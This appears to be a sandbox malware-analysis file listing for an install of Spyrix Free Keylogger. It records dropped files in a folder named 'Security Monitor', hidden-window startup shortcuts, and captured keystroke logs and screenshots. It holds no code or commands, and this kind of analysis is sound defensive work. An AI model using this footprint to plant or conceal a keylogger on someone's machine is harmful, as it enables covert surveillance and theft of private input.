dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-VKPQ0.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\law_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\norton_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-2FVV0.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-4IGJS.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-64V0H.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-6IA7V.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-860LB.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-9G4QP.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-EDOUQ.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-GDH08.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-GS73F.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-H4N3M.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-PMTL9.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-Q42RI.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-R6RKD.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-UFI76.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-UGPGJ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-VCGJJ.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-VQ9B8.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish.lng (copy)
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-2GDBB.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-4L6KV.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-4PS13.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-5NHI7.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-9I0JU.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-BCP2B.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-GSU6U.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-HEASS.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-J1CFJ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-JAPMR.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-JK2M9.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-KRPDU.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-LF7VD.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-MSRIV.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-OEHGL.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-PCPUJ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-PL3OH.tmp
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\logo.png (copy)
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\main.ico (copy)
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\offer.url (copy)
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.cmd (copy)
ASCII text, with very long lines (382), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sgw.m (copy)
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision 8, 320x240, components 3
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Air.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Android.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Charm.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Default.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\HUD.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\SnowLeopard.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Ubuntu.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Win8.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\iOS4.skn (copy)
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-14PI3.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-7NBNM.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-A0DCJ.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-D2UD1.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-EN2GR.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-M51F4.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-N0C51.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-QU5RS.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-T980U.tmp
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spyrix.url (copy)
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-1NSV6.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-BMRGT.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-Q435M.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-3J8FI.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-8CR71.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-CDKF2.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\tmain.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.dat
InnoSetup Log Spyrix Free Keylogger 11.6.22, version 0x418, 231569 bytes, 138727\37\user\376, C:\ProgramData\Security Monitor\{827D21CC-
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\45567.log
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb
SQLite 3.x database, last written using SQLite version 3013000, file counter 15, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 15
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb-journal
SQLite Rollback Journal
dropped
C:\ProgramData\Spyrix Free Keylogger\logs\logs.dat
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0081654051.jpg
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1036x957, components 3
dropped
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0082075116.jpg
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 891x487, components 3
dropped
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0083452199.jpg
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x1024, components 3
dropped
C:\ProgramData\Spyrix Free Keylogger\scr\scr.dat
ASCII text, with CRLF line terminators
modified
C:\ProgramData\Spyrix Free Keylogger\temp\desktop\Spyrix Free Keylogger.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Wed Oct 2 03:11:11 2024, mtime=Wed Oct 2 03:11:22 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini
Generic INItialization configuration [System]
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-1TFQ0.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-A80FN.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-IKLRH.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.dat (copy)
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.net (copy)
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.ttl (copy)
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-5G3KA.tmp
GIF image data, version 89a, 884 x 198
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-QU7U6.tmp
ASCII text, with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-VCGQQ.tmp
GIF image data, version 89a, 327 x 57
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\runprg.ini
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\start\Spyrix Free Keylogger.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Wed Oct 2 03:11:11 2024, mtime=Wed Oct 2 03:11:12 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\start\Uninstall Spyrix Free Keylogger.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Oct 2 03:11:10 2024, mtime=Wed Oct 2 03:11:10 2024, atime=Wed Oct 2 03:10:34 2024, length=1308909, window=hide
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_StartButton_EE7E4705DD4AC06ADFE650C2CDC39BDD
ASCII text, with very long lines (425), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD
ASCII text, with very long lines (419), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Run_First_EE7E4705DD4AC06ADFE650C2CDC39BDD
ASCII text, with very long lines (412), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Show_EE7E4705DD4AC06ADFE650C2CDC39BDD
ASCII text, with very long lines (408), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_wizard_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD
ASCII text, with very long lines (416), with no line terminators
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb
